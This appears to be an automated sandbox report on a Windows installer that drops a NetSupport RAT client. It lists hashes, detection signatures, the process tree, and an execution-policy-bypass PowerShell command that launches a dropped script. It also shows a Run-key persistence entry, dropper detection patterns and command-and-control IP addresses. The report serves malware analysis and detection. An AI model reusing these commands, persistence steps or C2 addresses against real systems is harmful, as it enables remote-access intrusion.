
Windows Analysis Report
KC0uZWwr8p.exe

Overview

General Information

Sample name: KC0uZWwr8p.exe (renamed because original name is a hash value)
Original sample name: 7b6e6212a6d13800282bd2cb362c2a311d89e543.exe
Analysis ID: 1552424
MD5: 3c387c0db035c0c3185d6fbd1ab46bd1
SHA1: 7b6e6212a6d13800282bd2cb362c2a311d89e543
SHA256: a1720d68eef7dc381a533fd8584a227db3dbcaed16098a0d7f31077f95355e8c
Tags: exe, NetworkUtilityPro, OMICAREJOINTSTOCKCOMPANY, user-NDA0E

Detection

NetSupport RAT, NetSupport Downloader
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Advanced IP Scanner Hacktool
Yara detected NetSupport Downloader
Bypasses PowerShell execution policy
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • KC0uZWwr8p.exe (PID: 2800 cmdline: "C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 3C387C0DB035C0C3185D6FBD1AB46BD1)
    • KC0uZWwr8p.tmp (PID: 1448 cmdline: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" MD5: 77264DBCB409DE0C426BD5088B0FBE09)
      • powershell.exe (PID: 5448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 4008 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • client32.exe (PID: 7072 cmdline: "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" MD5: 4F2D0F4A5BA798FA9E85379C7C4BD36E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(5 of 6 entries shown)

Source | Rule | Description | Author | Strings
00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000A.00000002.2118509299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000007.00000002.4094673945.0000000000404000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
(5 of 22 entries shown)

Source | Rule | Description | Author | Strings
8.2.client32.exe.6db60000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
10.2.client32.exe.6db60000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
8.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
8.2.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
7.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(5 of 20 entries shown)

Source | Rule | Description | Author | Strings
amsi32_5448.amsi.csv | JoeSecurity_NetSupportDownloader | Yara detected NetSupport Downloader | Joe Security |
amsi32_5448.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | (string matches listed below)
  • 0x2e4f73:$b1: ::WriteAllBytes(
  • 0x2e4f3f:$b2: ::FromBase64String(
  • 0x2f16ec:$s1: -join
  • 0x2eae98:$s4: +=
  • 0x2eaf5a:$s4: +=
  • 0x2ef181:$s4: +=
  • 0x2f129e:$s4: +=
  • 0x2f1588:$s4: +=
  • 0x2f16ce:$s4: +=
  • 0x2f4ee4:$s4: +=
  • 0x2f4fe8:$s4: +=
  • 0x2f8444:$s4: +=
  • 0x2f8b24:$s4: +=
  • 0x2f8fda:$s4: +=
  • 0x2f902f:$s4: +=
  • 0x2f92a3:$s4: +=
  • 0x2f92d2:$s4: +=
  • 0x2f981a:$s4: +=
  • 0x2f9849:$s4: +=
  • 0x2f9928:$s4: +=
  • 0x2fbbbf:$s4: +=

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp" /SL5="$20430,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp, ParentProcessId: 1448, ParentProcessName: KC0uZWwr8p.tmp, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1", ProcessId: 5448, ProcessName: powershell.exe

Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5448, TargetFilename: C:\Users\user\AppData\Roaming\SystemUtil\NSM.LIC

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-08T19:02:17.851088+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49733 | TCP
2024-11-08T19:02:56.688621+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49744 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-08T19:01:53.533170+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 199.188.200.195 | 443 | TCP
2024-11-08T19:01:53.533170+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 151.236.16.15 | 443 | TCP


AV Detection

Source: KC0uZWwr8p.exe | ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AC820
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_110AC820 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,8_2_110AC820
Source: KC0uZWwr8p.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\SystemUtil\msvcr100.dll
Source: KC0uZWwr8p.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.4097717699.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.2035313904.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000A.00000002.2122570956.000000006DB62000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: is-5C3J6.tmp.1.dr
Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdba source: is-BPHN2.tmp.1.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb00 source: is-Q62S4.tmp.1.dr
Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: is-RT7U6.tmp.1.dr
Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: is-MR0EO.tmp.1.dr
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 00000008.00000002.2035069652.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000A.00000002.2120902471.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, msvcr100.dll.3.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdb source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Widgets.pdb source: is-MH1O8.tmp.1.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\platforms\qwindows.pdbss' source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1945716217.0000000007043000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb"" source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: is-FLT6F.tmp.1.dr
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\plugins\printsupport\windowsprintersupport.pdb source: KC0uZWwr8p.tmp, 00000001.00000002.1996182111.00000000010EC000.00000004.00000010.00020000.00000000.sdmp, KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5Xml.pdb source: is-0LL3Q.tmp.1.dr
Source: Binary string: client32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004B19000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.3.dr
Source: Binary string: S:\src\Other\openssl_current\BuildOpenSSL\tmp\src_x86_dynamic_release\out32dll\libeay32.pdb source: is-BPHN2.tmp.1.dr
Source: Binary string: o:\Builder\BuildRoot\Free\Radmin_3_0_Install_Dll\Viewer\Release\Viewer.pdbt3 source: KC0uZWwr8p.tmp, 00000001.00000003.1982041950.0000000005E84000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Build\Qt\5.6.3\build32\qtbase\lib\Qt5WinExtras.pdb source: is-Q62S4.tmp.1.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000003.00000002.1912534174.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.4097611987.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 00000008.00000002.2035242629.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000A.00000002.2122115780.0000000068895000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.3.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: is-AQQBN.tmp.1.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: is-5KHP2.tmp.1.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: is-L4L9S.tmp.1.dr

Spreading

Source: Yara match | File source: C:\Program Files (x86)\Advanced IP Scanner\is-F5QT3.tmp, type: DROPPED
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,7_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064E30
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_6882CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6882CA9B
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_68830B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_68830B33
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_11123570
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_11069690
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,8_2_1110BB80
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_11107FE0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,8_2_110BC3D0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11064E30

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49740 -> 199.188.200.195:443
Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49739 -> 151.236.16.15:443
Source: Yara match | File source: amsi32_5448.amsi.csv, type: OTHER
